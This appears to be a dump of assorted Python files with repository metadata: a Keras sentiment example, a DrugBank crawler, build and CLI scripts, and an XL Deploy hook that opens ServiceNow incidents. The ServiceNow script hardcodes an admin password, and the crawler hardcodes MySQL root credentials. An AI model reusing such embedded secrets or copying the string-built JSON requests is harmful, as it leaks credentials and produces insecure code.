| 23.96 | 67 | 0.42571 | 89 | 599 | 2.865169 | 0.348315 | 0.023529 | 0.023529 | 0.117647 | 0.12549 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126404 | 0.405676 | 599 | 24 | 68 | 24.958333 | 0.589888 | 0.395659 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
805364bb7db976a9ae2d3096d0339f8997426097 | 2,610 | py | Python | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | null | null | null | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | 3 | 2021-03-19T11:26:35.000Z | 2021-09-08T01:43:48.000Z | cheatsheets/py/pyython.6a.keras.py | questsin/cheats | e8bfe3d206a240e29ded7b199113437f4aa42544 | [
"Apache-2.0"
] | null | null | null | from keras.datasets import imdb
top_words = 10000
(x_train, y_train), (x_test, y_test) = imdb.load_data(num_words=top_words)
#imdb.get_word_index()
word_dict = imdb.get_word_index()
word_dict = { key:(value + 3) for key, value in word_dict.items() }
word_dict[''] = 0 # Padding
word_dict['>'] = 1 # Start
word_dict['?'] = 2 # Unknown word
reverse_word_dict = { value:key for key, value in word_dict.items() }
print(' '.join(reverse_word_dict[id] for id in x_train[0]))
from keras.preprocessing import sequence
max_review_length = 500
x_train = sequence.pad_sequences(x_train, maxlen=max_review_length)
x_test = sequence.pad_sequences(x_test, maxlen=max_review_length)
from keras.models import Sequential
from keras.layers import Dense
from keras.layers.embeddings import Embedding
from keras.layers import Flatten
embedding_vector_length = 32
model = Sequential()
model.add(Embedding(top_words, embedding_vector_length, input_length=max_review_length))
model.add(Flatten())
model.add(Dense(16, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(1, activation='sigmoid'))
model.compile(loss='binary_crossentropy',optimizer='adam', metrics=['accuracy'])
print(model.summary())
hist = model.fit(x_train, y_train, validation_data=(x_test, y_test), epochs=5, batch_size=128)
import seaborn as sns
import matplotlib.pyplot as plt
# %matplotlib inline  # Jupyter magic; only valid inside a notebook, commented out so the file parses as plain Python
sns.set()
acc = hist.history['acc']
val = hist.history['val_acc']
epochs = range(1, len(acc) + 1)
plt.plot(epochs, acc, '-', label='Training accuracy')
plt.plot(epochs, val, ':', label='Validation accuracy')
plt.title('Training and Validation Accuracy')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.legend(loc='upper left')
plt.plot()
scores = model.evaluate(x_test, y_test, verbose=0)
print("Accuracy: %.2f%%" % (scores[1] * 100))
import string
import numpy as np
def analyze(text):
    # Prepare the input by removing punctuation characters, converting
    # characters to lower case, and removing words containing numbers
    translator = str.maketrans('', '', string.punctuation)
    text = text.translate(translator)
    text = text.lower().split(' ')
    text = [word for word in text if word.isalpha()]

    # Generate an input tensor
    input = [1]
    for word in text:
        if word in word_dict and word_dict[word] < top_words:
            input.append(word_dict[word])
        else:
            input.append(2)

    padded_input = sequence.pad_sequences([input], maxlen=max_review_length)

    # Invoke the model and return the result
    result = model.predict(np.array([padded_input][0]))[0][0]
return result | 33.461538 | 94 | 0.728736 | 387 | 2,610 | 4.751938 | 0.369509 | 0.052202 | 0.040783 | 0.016313 | 0.113649 | 0.113649 | 0.066884 | 0.038608 | 0.038608 | 0 | 0 | 0.016481 | 0.139847 | 2,610 | 78 | 95 | 33.461538 | 0.802673 | 0.092337 | 0 | 0.033333 | 0 | 0 | 0.07155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8058a85467ead4f2df3d7aeae90f5f3cb7569943 | 9,954 | py | Python | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 5 | 2017-03-31T03:25:09.000Z | 2021-12-17T02:28:24.000Z | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 165 | 2016-08-11T01:59:47.000Z | 2017-10-10T06:32:12.000Z | database/crawler/crawl_drugbank.py | tttor/csipb-jamu-prj | 33b08a8a12054c8a5a7240681a28c8b233b329ba | [
"MIT"
] | 11 | 2015-06-15T04:25:59.000Z | 2021-04-18T09:39:16.000Z | # crawl_drugbank.py
import time
import pickle
import json
import MySQLdb
import httplib
import urllib2 as urllib
from collections import defaultdict
import dbcrawler_util as util
from datetime import datetime
from bs4 import BeautifulSoup as bs
outDir = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002'
db = MySQLdb.connect("localhost","root","123","ijah" )
cursor = db.cursor()
def main():
#########
# drugProteinDict = parseUniprotlinkFile() # contain drug-protein binding info
# drugbankIdList = drugProteinDict.keys()
# drugbankIdList = ['DB01627','DB05101','DB05107','DB08423','DB05127']
# drugData = parseDrugWebpage(drugbankIdList)
# drugData = parseSmiles(drugbankIdList)
# fixDrugData()
def fixDrugData():
badWords = ['email','class="wrap"','.smiles','href']
old = None
smilesDict = None
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.ori.pkl'
with open(fpath, 'rb') as handle:
old = pickle.load(handle)
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_smiles_2016-10-05_12:35:37.724557.pkl'
with open(fpath, 'rb') as handle:
smilesDict = pickle.load(handle)
nOld = len(old)
new = old
idx = 0
for k,v in old.iteritems():
idx += 1
print 'fixing', k, 'idx=', str(idx), 'of', nOld
if 'SMILES' in v.keys():
oldSmiles = v['SMILES']
bad = False
for b in badWords:
if b in oldSmiles:
bad = True
break
if bad:
new[k]['SMILES'] = smilesDict[k]
else:
new[k]['SMILES'] = smilesDict[k]
for k2,v2 in v.iteritems():
for b in badWords:
if b in v2:
new[k][k2] = 'not-available'
assert(len(old)==len(new))
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.pkl'
with open(fpath, 'wb') as f:
pickle.dump(new, f)
fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_drug_data_2016-10-05_10:16:42.860649.json'
with open(fpath, 'w') as f:
json.dump(new, f, indent=2, sort_keys=True)
def parseUniprotlinkFile():
dpFpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/uniprot_links.csv'
now = datetime.now()
drugProteinDict = dict()
idx = 0
with open(dpFpath) as infile:
first = True
hot = ''
for line in infile:
if not(first):
idx += 1
print 'parsing idx=', idx
line = line.strip();
quoteIdx = [i for i,c in enumerate(line) if c=='"']; assert(len(quoteIdx)%2==0)
quoteIdx = [j for i,j in enumerate(quoteIdx) if i%2==0] # take only odd-indexed idx
words = line.split('"')
words2 = []
for w in words:
i = line.find(w) # just after an opening quote
w2 = w
if (i-1) in quoteIdx:
w2 = w.replace(',','$')
if len(w2)!=0:
words2.append(w2)
line = ' '.join(words2)
words = line.split(',');
words = words[0:4]
words = [w.strip() for w in words]
words = [w.replace('$',',') for w in words]
drugbankId = words[0]
name = words[1]
uniprotId = words[3]
if hot != drugbankId:
hot = drugbankId
drugProteinDict[hot] = defaultdict(list)
if len(drugProteinDict[hot]['name'])==0:
drugProteinDict[hot]['name'] = name
drugProteinDict[hot]['targetProtein'].append(uniprotId)
first = False
jsonFpath = outDir+'/drugbank_drug_vs_protein_'+str(now.date())+'_'+str(now.time())+'.json'
with open(jsonFpath, 'w') as f:
json.dump(drugProteinDict, f, indent=2, sort_keys=True)
pklFpath = outDir+'/drugbank_drug_vs_protein_'+str(now.date())+'_'+str(now.time())+'.pkl'
with open(pklFpath, 'wb') as f:
pickle.dump(drugProteinDict, f)
return drugProteinDict
def parseDrugWebpage(drugbankIdList): # e.g. http://www.drugbank.ca/drugs/DB05107
html = None
comData = dict()
now = datetime.now()
nDbId = len(drugbankIdList)
for idx, dbId in enumerate(drugbankIdList):
print 'parsing', dbId, 'idx=', str(idx+1), 'of', str(nDbId)
baseURL = 'http://www.drugbank.ca/drugs/'
url = baseURL+dbId
html = urllib.urlopen(url)
# baseFpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/'
# fpath = baseFpath+dbId+ '.html'
# with open(fpath, 'r') as content_file:
# html = content_file.read()
#
soup = bs(html, 'html.parser')
#
datum = defaultdict(list)
# datum['name'] = str(soup.title.string).split()[1].strip()
trList = soup.find_all('tr')
for tr in trList:
trStr = str(tr)
keys = ['InChI Key','CAS number','Chemical Formula','SMILES']
for k in keys:
if (k in trStr)and('.smiles' not in trStr)and('class="wrap"' not in trStr)and('href' not in trStr):
trStr = trStr.split('<td>')[1].replace('</td></tr>','')
trStr = trStr.replace('InChIKey=','')
trStr = trStr.replace('<div class="wrap">','').replace('</div>','')
trStr = trStr.replace('<sub>','').replace('</sub>','')
if ('wishart-not-available' in trStr) or trStr=='':
trStr = 'not-available'
# print trStr
datum[k] = trStr
aList = soup.find_all('a')
cidBaseUrl = 'http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi?cid='
sidBaseUrl = 'http://pubchem.ncbi.nlm.nih.gov/summary/summary.cgi?sid='
chemspiderBaseUrl = 'http://www.chemspider.com/Chemical-Structure.'
uniprotBaseUrl = 'http://www.uniprot.org/uniprot/'
for a in aList:
href = str(a.get('href'))
if cidBaseUrl in href:
datum['pubchemCid']= str(a.get('href').strip(cidBaseUrl))
elif sidBaseUrl in href:
datum['pubchemSid']= str(a.get('href').strip(sidBaseUrl))
elif chemspiderBaseUrl in href:
datum['chemspiderId'] = str(a.get('href').strip(chemspiderBaseUrl).strip('.html'))
elif uniprotBaseUrl in href:
datum['uniprotTargets'].append( str(a.get('href').strip(uniprotBaseUrl)) )
comData[dbId] = datum
if ((idx+1)%100)==0 or idx==(nDbId-1):
jsonFpath = outDir+'/drugbank_drug_data_'+str(now.date())+'_'+str(now.time())+'.json'
with open(jsonFpath, 'w') as f:
json.dump(comData, f, indent=2, sort_keys=True)
pklFpath = outDir+'/drugbank_drug_data_'+str(now.date())+'_'+str(now.time())+'.pkl'
with open(pklFpath, 'wb') as f:
pickle.dump(comData, f)
return comData
def parseSmiles(drugbankIdList):
now = datetime.now()
nDbId = len(drugbankIdList)
baseURL = 'http://www.drugbank.ca/structures/structures/small_molecule_drugs/'
smiles = dict()
for idx, dbId in enumerate(drugbankIdList):
print 'parsing', dbId, 'idx=', str(idx+1), 'of', str(nDbId)
s = 'not-available'
url = baseURL+dbId+'.smiles'
try:
s = urllib.urlopen(url)
except urllib.HTTPError, e:
print('HTTPError = ' + str(e.code))
except urllib.URLError, e:
print('URLError = ' + str(e.reason))
except httplib.HTTPException, e:
print('HTTPException')
except Exception:
import traceback
print('generic exception: ' + traceback.format_exc())
s = bs(s, 'html.parser')
smiles[dbId] = str(s)
if ((idx+1)%100)==0 or idx==(nDbId-1):
jsonFpath = outDir+'/drugbank_drug_smiles_'+str(now.date())+'_'+str(now.time())+'.json'
with open(jsonFpath, 'w') as f:
json.dump(smiles, f, indent=2, sort_keys=True)
pklFpath = outDir+'/drugbank_drug_smiles_'+str(now.date())+'_'+str(now.time())+'.pkl'
with open(pklFpath, 'wb') as f:
pickle.dump(smiles, f)
# print smiles
return smiles
# def parseDrugbankVocab():
# fpath = '/home/tor/robotics/prj/csipb-jamu-prj/dataset/drugbank/drugbank_20161002/drugbank_vocabulary.csv'
# with open(fpath) as infile:
# first = True
# idx = 0
# for line in infile:
# if not(first):
# idx += 1
# print 'updating idx=', idx
# line = line.strip()
# words = line.split(',')
# words = words[0:4]
# drugbankId = words[0]
# cas = words[3]
# cas = cas.replace('"','')
# if len(cas)!=0 and len(drugbankId)!=0:
# drugbankId = '"'+drugbankId+'"'
# cas = '"'+cas+'"'
# qf = 'UPDATE compound SET '
# qm = 'com_cas_id='+cas
# qr = ' WHERE com_drugbank_id='+drugbankId
# q = qf+qm+qr
# # print q
# util.mysqlCommit(db, cursor, q)
# first = False
if __name__ == '__main__':
start_time = time.time()
main()
print("--- %s seconds ---" % (time.time() - start_time))
| 35.55 | 140 | 0.544806 | 1,150 | 9,954 | 4.646957 | 0.228696 | 0.019461 | 0.022455 | 0.026946 | 0.378743 | 0.33271 | 0.315494 | 0.288922 | 0.288922 | 0.273578 | 0 | 0.034017 | 0.308921 | 9,954 | 279 | 141 | 35.677419 | 0.742841 | 0.166466 | 0 | 0.149171 | 0 | 0.027624 | 0.199248 | 0.093921 | 0 | 0 | 0 | 0 | 0.01105 | 0 | null | null | 0 | 0.060773 | null | null | 0.049724 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
8058ac0f97a55a2585c802f841a4705f0c870641 | 1,051 | py | Python | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | null | null | null | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | 1 | 2021-03-27T15:52:06.000Z | 2021-03-27T15:52:06.000Z | k2/__init__.py | sequeender/k2 | 26dab3332dd8620264fec522ab3a0455f21377cc | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# flake8: noqa
# -------------- Add path of _k2.so into sys.path --------------
import os as _os
import sys as _sys
_current_module = _sys.modules[__name__]
_k2_dir = _os.path.dirname(_current_module.__file__)
if not hasattr(_current_module, "__path__"):
    __path__ = [_k2_dir]
elif _k2_dir not in __path__:
    __path__.append(_k2_dir)
_sys.path.append(__path__)
# ---------------------- Absolute import ----------------------
from k2._k2host import IntArray2Size
from k2._k2host import FbWeightType
from k2 import python
# ---------------------- Setting __all__ ----------------------
# Add more symbols into this file's scope whose names do not start with '_'.
__all__.extend(
    [_s for _s in dir() if not _s.startswith("_") and _s not in __all__]
)

# Explicitly avoid importing the wild star, like "from k2 import *".
# This gives a suggestion for users to follow the conventional usage --
# just import needed symbols:
#     from k2 import Fsa
#     from k2.fsa import Fsa
__all__.extend(["DO_NOT_WILD_IMPORT"])
| 27.657895 | 75 | 0.652712 | 145 | 1,051 | 4.213793 | 0.468966 | 0.05892 | 0.05892 | 0.05892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018079 | 0.157945 | 1,051 | 37 | 76 | 28.405405 | 0.672316 | 0.482398 | 0 | 0 | 0 | 0 | 0.050752 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
337be1ea8a2157dad08a162f07bb9bd2265babca | 2,710 | py | Python | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | python_exc_3/copyspecial.py | fpecek/python-exercise | 065c6441f1472a4835cbd1faab09ac96c2c9457b | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
import sys
import re
import os
import shutil
import subprocess
import zipfile
"""
Copy Special exercise
"""
# +++your code here+++
# Write functions and modify main() to call them
def get_special_paths(directory):
    """
    Returns a list of the absolute paths of the special files in the given directory.
    "special" file is one where the name contains the pattern __w__ somewhere,
    where the w is one or more word chars.
    """
    special_files = []
    filenames = os.listdir(directory)
    for filename in filenames:
        special_file_match = re.search(r'__\w+__', filename)
        if special_file_match:
            special_files.append(os.path.abspath(os.path.join(directory, filename)))
    return special_files


def copy_to(paths, directory):
    """
    Copy all paths to given directory
    """
    if not os.path.exists(directory):
        os.mkdir(directory)
    for path in paths:
        shutil.copy(path, directory)


def zip_to(paths, zip_path):
    """
    Add all files from given paths to zip file
    """
    # REVIEW: did you mean: zipfile.ZipFile(zip_path, 'w')
    with zipfile.ZipFile(zip_path, 'w') as zipf:
        for path in paths:
            zipf.write(path)


def zip_to_command(paths, zip_path):
    """
    Add all files from given paths to zip file
    """
    subprocess.run(['zip', '-j', zip_path] + paths)


def main():
    # This basic command line argument parsing code is provided.
    # Add code to call your functions below.

    # Make a list of command line arguments, omitting the [0] element
    # which is the script itself.
    args = sys.argv[1:]
    if not args:
        print("usage: [--todir dir][--tozip zipfile] dir [dir ...]")
        sys.exit(1)

    # todir and tozip are either set from command line
    # or left as the empty string.
    # The args array is left just containing the dirs.
    to_dir = ''
    if args[0] == '--todir':
        to_dir = args[1]
        del args[0:2]

    to_zip = ''
    if args[0] == '--tozip':
        to_zip = args[1]
        del args[0:2]

    if len(args) == 0:
        print("error: must specify one or more dirs")
        sys.exit(1)

    # +++your code here+++
    # Call your functions
    for directory in args:
        paths = get_special_paths(directory)
        if to_dir:
            copy_to(paths, to_dir)
        elif to_zip:
            zip_to_command(paths, to_zip)
        else:
            print('\n'.join(paths))


if __name__ == "__main__":
    main()
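# Example invocations (directory, file and zip names are placeholders):
#   python copyspecial.py ./source_dir
#   python copyspecial.py --todir /tmp/special ./source_dir
#   python copyspecial.py --tozip special.zip ./source_dir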
| 24.862385 | 85 | 0.627306 | 389 | 2,710 | 4.249357 | 0.362468 | 0.018149 | 0.018149 | 0.029038 | 0.099214 | 0.072595 | 0.055656 | 0.055656 | 0.055656 | 0.055656 | 0 | 0.0105 | 0.261993 | 2,710 | 108 | 86 | 25.092593 | 0.816 | 0.371956 | 0 | 0.117647 | 0 | 0 | 0.078135 | 0 | 0 | 0 | 0 | 0.018519 | 0 | 1 | 0.098039 | false | 0 | 0.117647 | 0 | 0.235294 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
337fb62497c441679efa5ff81eacc164419c490b | 458 | py | Python | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | 1 | 2017-05-02T21:28:02.000Z | 2017-05-02T21:28:02.000Z | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | null | null | null | setup.py | Julian/giraffe | 8ef37fcb0a7cc5aa24c684d17568c55ad04692dc | [
"MIT"
] | null | null | null | from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
    name="giraffe",
    version="0.1",
    package_dir={"giraffe": ""},
    packages=["giraffe"],
    cmdclass={'build_ext': build_ext},
    ext_modules=[
        Extension("graph", ["giraffe/graph.pyx"]),
        Extension("graph_mixin", ["giraffe/graph_mixin.pyx"]),
    ],
)
| 28.625 | 75 | 0.576419 | 46 | 458 | 5.586957 | 0.478261 | 0.093385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006116 | 0.286026 | 458 | 15 | 76 | 30.533333 | 0.779817 | 0 | 0 | 0 | 0 | 0 | 0.194323 | 0.050218 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.214286 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3383b63311713ea3400e46bf259718c4551057ed | 921 | py | Python | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | modules/report6.py | Seyon7/report | ac8b4778287cbc0f9c48aca61e65f41ef612d385 | [
"MIT"
] | null | null | null | import click
from modules.processor import build_report, print_report
@click.group(invoke_without_command=True)
@click.option('--files', '-f', required=True, type=str, prompt="Provide the path to data files")
@click.pass_context
def cli_root(ctx, files):
    ctx.meta['files'] = files


@cli_root.command()
@click.argument('name', type=str)
@click.pass_context
def driver(ctx, name):
    files = ctx.meta['files']
    report = build_report(files, driver=name)
    print_report(report)


@cli_root.command()
@click.argument('order', type=click.Choice(["asc", "desc"]), default="asc")
@click.pass_context
def ls(ctx, order):
    files = ctx.meta['files']
    if order not in ("asc", "desc"):
        raise IOError("Wrong sorting direction")
    report = build_report(files, order=order)
    # TODO: add logic so that a missing error_log is treated as an error; decide where this check belongs.
    print_report(report)
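# Usage sketch (illustrative; assumes cli_root() is invoked from an entry point
# elsewhere, and the data path / driver name below are placeholders):
#     cli_root(args=['--files', './data', 'ls', 'desc'])
#     cli_root(args=['--files', './data', 'driver', 'SomeDriverName'])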
| 29.709677 | 107 | 0.710098 | 132 | 921 | 4.840909 | 0.492424 | 0.051643 | 0.075117 | 0.089202 | 0.084507 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.145494 | 921 | 30 | 108 | 30.7 | 0.811944 | 0.109663 | 0 | 0.391304 | 0 | 0 | 0.127139 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.130435 | false | 0.130435 | 0.086957 | 0 | 0.217391 | 0.130435 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
3385d0740834d136b94244297d0e01af822e4328 | 622 | py | Python | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | Blatt1/src/script.py | lewis206/Computational_Physics | 06ad6126685eaf65f5834bfe70ebd91b33314395 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
import matplotlib
# Set fontsize larger for latex plots
matplotlib.rcParams.update({'font.size': 20})
# Generate data from file
x, y = np.genfromtxt("bin/python_Aufgabe2.txt", unpack=True)
m, n = x[-1], y[-1]
# Plotting
plt.figure(figsize=(12,7))
plt.grid()
plt.xlabel("x")
plt.ylabel("y")
x_new = np.linspace(min(x)-x[:-1].std()/2, max(x)+x[:-1].std()/2)
plt.plot(x[:-1], y[:-1], "x", mew=2., alpha=2, label="Datenpunkte")
plt.plot(x_new, m*x_new+n, "-", linewidth=3, label="Ausgleichsgerade")
plt.legend()
plt.tight_layout()
plt.savefig("bin/figure.pdf", dpi=1200)
| 27.043478 | 70 | 0.680064 | 110 | 622 | 3.8 | 0.572727 | 0.019139 | 0.014354 | 0.019139 | 0.033493 | 0 | 0 | 0 | 0 | 0 | 0 | 0.037567 | 0.101286 | 622 | 22 | 71 | 28.272727 | 0.710197 | 0.109325 | 0 | 0 | 1 | 0 | 0.14 | 0.041818 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1875 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3387d6dfab24bbf352088172ca1497dc6db9c9b1 | 712 | py | Python | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 38 | 2020-01-14T01:20:15.000Z | 2022-02-15T00:03:33.000Z | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 7 | 2020-01-13T18:08:07.000Z | 2022-01-13T02:20:30.000Z | build.py | LagoLunatic/GCFT | d838614804058c7b7ea5c62b37251a2795f5c791 | [
"MIT"
] | 1 | 2021-09-23T19:30:55.000Z | 2021-09-23T19:30:55.000Z |
from zipfile import ZipFile
import os
from version import VERSION
base_name = "GameCube File Tools"
base_name_with_version = base_name + " " + VERSION
import struct
if (struct.calcsize("P") * 8) == 64:
    base_name_with_version += "_64bit"
    base_zip_name = base_name_with_version
else:
    base_name_with_version += "_32bit"
    base_zip_name = base_name_with_version
zip_name = base_zip_name.replace(" ", "_") + ".zip"
exe_path = "./dist/%s.exe" % base_name_with_version
if not os.path.isfile(exe_path):
    raise Exception("Executable not found: %s" % exe_path)

with ZipFile("./dist/" + zip_name, "w") as zip:
    zip.write(exe_path, arcname="%s.exe" % base_name)
    zip.write("README.md", arcname="README.txt")
| 26.37037 | 56 | 0.723315 | 110 | 712 | 4.354545 | 0.354545 | 0.150313 | 0.150313 | 0.237996 | 0.125261 | 0.125261 | 0.125261 | 0 | 0 | 0 | 0 | 0.011438 | 0.140449 | 712 | 26 | 57 | 27.384615 | 0.771242 | 0 | 0 | 0.105263 | 0 | 0 | 0.153305 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.210526 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
3388f9df9b80255086f1204a7c8b7e0f3646bb15 | 2,012 | py | Python | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null | src/main/resources/servicenow/OpenTicket.py | xdanw/xld-servicenow-incidentlog | 9ae4ccf5a110dab0294aa38cd04b2abc8615acba | [
"MIT"
] | null | null | null |
import json
import requests
import requests.utils
# Fixes some issues with TLS
import os
os.environ['REQUESTS_CA_BUNDLE'] = 'ca.pem';
# --- Debug Purposes Only, Server Config Is Hard Coded ---
#
#
# print "Debug ... " + deployed.ResultUri;
# response = requests.get('https://webhook.site/062e2ea7-5a36-4abb-a2c8-862dd85f777f')
# print response.status_code;
task = context.getTask()
# Debug
# print "Task info?"
# print str(task.getId());
# print str(task.getUsername());
# print str(task.getMetadata());
msg = "Message: " + str(task.getMetadata()['application']) + \
" (ver: " + str(task.getMetadata()['version']) + ") " + \
"is being deployed to: " + str(task.getMetadata()['environment']) + \
" by user: " + str(task.getUsername());
print msg;
# --- ServiceNow API ---
# per https://docs.servicenow.com/bundle/london-application-development/page/integrate/inbound-rest/concept/c_TableAPI.html
# Set the request parameters
url = 'https://dev58646.service-now.com/api/now/table/incident'
# Eg. User name="admin", Password="admin" for this code sample.
user = 'admin'
pwd = 'dgZyGsSI6L7z'
# Set proper headers
headers = {"Content-Type":"application/json","Accept":"application/json"}
# Do the HTTP request
data = "{'short_description':'" + msg +"','urgency':'5','impact':'5'}"
response = requests.post(url, auth=(user, pwd), headers=headers ,data=data)
# Check for HTTP codes other than 200 and 201
if response.status_code != 200 and response.status_code != 201:
print('Status:', response.status_code, 'Headers:', response.headers, 'Error Response:',response.json())
raise exception;
# Decode the JSON response into a dictionary and use the data
data = response.json()
# print(data)
# responseData = json.loads(data)
# print str(responseData.get('result').get('sys_id')); # Get sys_id
# --- End API ---
context.setAttribute('ticket_sys_id', str(data['result']['sys_id']))
print 'Storing attribute... sys_id: ' + context.getAttribute('ticket_sys_id');
print "Ticket opened.";
